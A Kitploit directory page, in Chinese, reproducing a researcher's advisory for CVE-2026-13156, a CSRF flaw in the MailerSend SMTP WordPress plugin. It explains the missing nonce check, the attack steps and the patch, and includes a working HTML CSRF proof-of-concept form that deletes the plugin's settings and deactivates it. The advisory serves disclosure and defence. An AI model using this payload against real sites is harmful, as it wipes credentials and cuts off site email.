Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-13156 — CVE-2026-13156 漏洞公告与 PoC — 发现者:Huynh Kien Minh (MinhHK)。 | Kitploit
工具/GitHubGitHub/minhhk68/cve-2026-13156
钓鱼工具漏洞分析漏洞利用Web安全论文与研究学习与教育
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 漏洞公告与 PoC — 发现者:Huynh Kien Minh (MinhHK)。

查看仓库
51个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-13156 — MailerSend 官方 SMTP 集成插件 < 1.0.8 通过 CSRF 删除设置并停用插件

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory CVE-2026-13156 CSRF Attack Chain Infographic


📌 摘要与快速链接

[!IMPORTANT] 摘要: 在 WordPress 官方 MailerSend SMTP 集成插件(< 1.0.8)中发现了一个高危跨站请求伪造(CSRF)漏洞(CVE-2026-13156)。配置清除处理器 mailersend_handle_configuration_delete() 验证了管理员权限(manage_options),但完全省略了 WordPress Nonce 验证(check_admin_referer())。攻击者可以构造恶意跨源请求,针对已认证的 WordPress 管理员,静默清除存储的 SMTP 凭据并强制停用插件,导致所有电子邮件工作流完全拒绝服务。

👉 在 Medium 上阅读完整深度技术分析文章:深度技术分析:CVE-2026-13156 或浏览我的安全作品集:https://minhhk.web.app/


📋 执行摘要与漏洞概述

  • 漏洞 ID: CVE-2026-13156(WPScan 公告 ID:595e653d-0904-43cf-8e61-d684599de11b)
  • 受影响软件: MailerSend – 官方 SMTP 集成(WordPress 插件)
  • 受影响版本: 1.0.8 之前的所有版本(< 1.0.8)
  • 漏洞类型: 跨站请求伪造(CSRF,导致设置清除和插件停用)— CWE-352
  • 主要研究员与披露者: Huynh Kien Minh(别名:MinhHK)
  • 角色与所属机构: 信息安全专业学生、漏洞赏金猎人、进攻性安全研究员。

关于研究员:
Huynh Kien Minh(Huỳnh Kiến Minh)是一位积极进取的网络安全研究员和漏洞分析师,以深入的安全评估和负责任披露而闻名,包括对 CVE-2026-13156 的技术剖析。他还因发现并披露关键安全漏洞而正式入选 Proton 安全名人堂 并获得表彰。


🌐 官方验证中心与参考资料

如需验证本技术公告、浏览概念验证分析或联系研究员,请访问:

  • 🏠 官方作品集中心: Huynh Kien Minh 安全作品集中心
  • 💼 LinkedIn 个人主页: 在 LinkedIn 上联系 Huynh Kien Minh
  • 📝 官方 Medium 白皮书: 深度技术分析:CVE-2026-13156(Medium)
  • 👨‍💻 GitHub 个人主页: MinhHK68 GitHub 个人主页
  • 🔗 WPScan 公告: CVE-2026-13156 的 WPScan 条目
  • 🔗 BaseFortify 报告: BaseFortify CVE-2026-13156 分析

🔍 深度技术剖析与根本原因分析

1. 根本原因分析(缺少 Nonce 验证)

MailerSend 官方 SMTP 集成 WordPress 插件(1.0.8 之前版本)注册了一个管理操作(configuration-delete),旨在从管理仪表板触发时清除存储的 API 令牌、清空 SMTP 配置选项(wp_options)并停用插件。

虽然该端点验证了当前用户是否具有 manage_options 权限(确保请求来自管理员会话),但它未能执行 WordPress nonce(check_admin_referer() 或 wp_verify_nonce())验证。

由于缺少 nonce 验证的 HTTP 请求无法区分管理员的有意点击和伪造的跨源请求,任何由已认证管理员加载的外部网站都可以静默触发 configuration-delete 操作。

2. 攻击生命周期与影响

  1. 目标识别: 攻击者识别使用 MailerSend SMTP(< 1.0.8)的目标 WordPress 网站。
  2. 载荷投递: 攻击者构造一个恶意 HTML/JavaScript 网页,其中包含一个自动提交的表单,指向管理端点(/wp-admin/admin-post.php 或 /wp-admin/admin.php?page=mailersend&action=configuration-delete)。
  3. 触发: 已登录的 WordPress 管理员访问攻击者的网页(例如,通过钓鱼、论坛链接或外部网站上的 XSS)。
  4. 执行与拒绝服务: 浏览器随管理员的活跃会话 Cookie 一起发送伪造请求。MailerSend 插件执行删除处理器:
    • 所有存储的 MailerSend SMTP 设置和 API 凭据从数据库中被清除。
    • MailerSend 插件被自动停用。
    • 关键影响: 目标网站立即失去所有电子邮件发送能力(密码重置、订单通知、安全警报在无预警的情况下失败)。

💻 概念验证(PoC)漏洞利用代码

[!WARNING] 道德声明: 以下 HTML 跨站请求伪造(CSRF)概念验证载荷由 Huynh Kien Minh 提供,仅用于教育目的、防御性验证以及在道德披露协议下进行安全审计。请勿针对未经授权的目标执行。

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ 修复与补丁分析

面向系统管理员与网站所有者

  • 立即升级: 立即将 MailerSend – 官方 SMTP 集成插件升级到 1.0.8 或更高版本。
  • 会话卫生: 在浏览外部不受信任的网页时,务必退出 WordPress 管理账户,或使用独立的隔离浏览器配置文件(或容器)进行网站管理。

面向开发者(补丁工作原理)

要在 WordPress 插件中正确保护管理状态变更操作,开发者必须在处理请求之前强制执行严格的 nonce 验证:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 相关安全荣誉

  • 🏆 Proton 名人堂表彰: 因发现并报告 Proton 基础设施中的关键缺陷而获得表彰。
  • 🏠 官方作品集中心: 探索 Huynh Kien Minh 的更多进攻性安全研究、开源安全工具和出版物。

⚖️ 许可证与版权

本仓库和技术公告由 Huynh Kien Minh (MinhHK) 根据负责任披露准则维护和发布,旨在促进更安全的全球 WordPress 和网络安全生态系统。

下载工具